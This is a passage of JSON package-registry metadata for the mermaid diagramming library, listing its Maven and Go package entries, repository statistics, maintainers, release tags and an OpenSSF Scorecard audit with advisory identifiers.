positories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.384Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.979943940947386,"dependent_packages_count":48.85985838769028,"stargazers_count":null,"forks_count":null,"average":40.41990116431883},"purl":"pkg:maven/org.webjars.bower/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.webjars.bower:mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.webjars.bower:mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.webjars.bower:mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.bower:mermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.bower:mermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.bower:mermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.bower:mermaid/related_packages","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":547830,"maintainers_count":0,"namespaces_count":72829,"keywords_count":34284,"github":"maven-central","metadata":{"funded_packages_count":34718},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2025-09-05T07:43:30.839Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":3715514,"name":"github.com/mermaid-js/mermaid","ecosystem":"go","description":"","homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":[],"namespace":"github.com/mermaid-js","versions_count":33,"first_release_published_at":"2020-12-05T13:43:29.000Z","latest_release_published_at":"2024-08-23T12:07:47.000Z","latest_release_number":"v11.0.0+incompatible","last_synced_at":"2025-09-04T09:31:46.664Z","created_at":"2022-04-11T12:57:51.407Z","updated_at":"2025-09-04T09:31:46.664Z","registry_url":"https://pkg.go.dev/github.com/mermaid-js/mermaid","install_command":"go get github.com/mermaid-js/mermaid","documentation_url":"https://pkg.go.dev/github.com/mermaid-js/mermaid#section-documentation","metadata":{},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/